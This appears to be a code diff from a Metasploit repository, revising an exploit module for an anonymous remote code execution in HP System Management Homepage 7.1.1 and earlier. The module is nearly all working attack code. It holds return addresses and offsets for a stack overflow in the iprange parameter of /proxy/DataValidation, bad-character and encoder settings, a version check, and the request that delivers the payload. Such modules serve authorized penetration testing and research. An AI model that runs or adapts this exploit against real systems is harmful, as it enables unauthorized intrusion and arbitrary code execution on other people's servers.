|
8 | 8 | require 'msf/core' |
9 | 9 |
|
10 | 10 | class Metasploit3 < Msf::Exploit::Remote |
11 | | - Rank = AverageRanking |
| 11 | + Rank = NormalRanking |
| 12 | + |
| 13 | + HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } |
12 | 14 |
|
13 | 15 | include Msf::Exploit::Remote::HttpClient |
14 | 16 |
|
15 | 17 | def initialize(info = {}) |
16 | 18 | super(update_info(info, |
17 | 19 | 'Name' => 'HP System Management Anonymous Access Code Execution', |
18 | 20 | 'Description' => %q{ |
19 | | - This module exploits an anonymous remote code execution on hp system management 7.1.1 and inferior. |
| 21 | + This module exploits an anonymous remote code execution on HP System Management |
| 22 | + 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on |
| 23 | + a request against /proxy/DataValidation. In order to work HP System Management must |
| 24 | + be configured with Anonymous access enabled. |
20 | 25 | }, |
21 | | - 'Author' => [ 'agix - @agixid' ], |
| 26 | + 'Author' => [ 'agix' ], # @agixid |
22 | 27 | 'License' => MSF_LICENSE, |
23 | 28 | 'Payload' => |
24 | 29 | { |
25 | 30 | 'DisableNops' => true, |
26 | 31 | 'Space' => 1000, |
27 | 32 | 'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20", |
| 33 | + 'EncoderOptions' => |
| 34 | + { |
| 35 | + 'BufferRegister' => 'ESP' # See the comments below |
| 36 | + } |
28 | 37 | }, |
29 | 38 | 'Platform' => ['linux'], |
30 | 39 | 'Arch' => ARCH_X86, |
31 | 40 | 'References' => |
32 | 41 | [ |
33 | | - ['URL', 'http://bit.ly/YhjikT'] |
34 | | - ] |
35 | | - 'Targets' => [ |
36 | | - |
| 42 | + #['URL', 'http://bit.ly/YhjikT'], |
| 43 | + #['OSVDB', 'http://bit.ly/YhjikT'] |
| 44 | + ], |
| 45 | + 'Targets' => |
| 46 | + [ |
37 | 47 | [ 'HP System Management 7.1.1 - Linux (CentOS)', |
38 | | - { |
39 | | - 'Ret' => 0x8054e14, # push esp / ret |
40 | | - 'Offset' => 267 |
41 | | - } |
| 48 | + { |
| 49 | + 'Ret' => 0x8054e14, # push esp / ret |
| 50 | + 'Offset' => 267 |
| 51 | + } |
42 | 52 | ], |
43 | 53 | [ 'HP System Management 6.3.0 - Linux (CentOS)', |
44 | | - { |
45 | | - 'Ret' => 0x805a547, # push esp / ret |
46 | | - 'Offset' => 267 |
47 | | - } |
| 54 | + { |
| 55 | + 'Ret' => 0x805a547, # push esp / ret |
| 56 | + 'Offset' => 267 |
| 57 | + } |
48 | 58 | ] |
49 | | - |
50 | 59 | ], |
51 | 60 | 'DisclosureDate' => 'Sep 01 2012', |
52 | 61 | 'DefaultTarget' => 0)) |
53 | 62 |
|
| 63 | + register_options( |
| 64 | + [ |
| 65 | + Opt::RPORT(2381), |
| 66 | + OptBool.new('SSL', [true, 'Use SSL', true]) |
| 67 | + ], self.class) |
| 68 | + |
| 69 | + end |
| 70 | + |
| 71 | + def check |
| 72 | + res = send_request_cgi({ |
| 73 | + 'method' => 'GET', |
| 74 | + 'uri' => "/cpqlogin.htm" |
| 75 | + }) |
| 76 | + |
| 77 | + if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ |
| 78 | + version = $1 |
| 79 | + return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1" |
| 80 | + end |
| 81 | + |
| 82 | + return Exploit::CheckCode::Safe |
| 83 | + end |
| 84 | + |
54 | 85 | def exploit |
55 | | - padding = rand_text(target['Offset']) |
| 86 | + |
| 87 | + padding = rand_text_alpha(target['Offset']) |
56 | 88 | ret = [target['Ret']].pack('V') |
57 | | - uri = "/proxy/DataValidation" |
58 | 89 | iprange = "a-bz"+padding+ret+payload.encoded |
59 | | - print_status("Sending #{uri.length} bytes payload...") |
| 90 | + |
| 91 | + print_status("#{rhost}:#{rport} - Sending exploit...") |
60 | 92 |
|
61 | 93 | res = send_request_cgi({ |
62 | | - 'method' => 'GET', |
63 | | - 'uri' => uri, |
64 | | - 'vars_get' => { |
65 | | - 'iprange' => iprange |
66 | | - } |
67 | | - }) |
68 | | - handler |
| 94 | + 'method' => 'GET', |
| 95 | + 'uri' => "/proxy/DataValidation", |
| 96 | + 'encode_params' => false, |
| 97 | + 'vars_get' => { |
| 98 | + 'iprange' => iprange |
| 99 | + } |
| 100 | + }) |
| 101 | + |
69 | 102 | end |
70 | 103 |
|
71 | 104 | end |
0 commit comments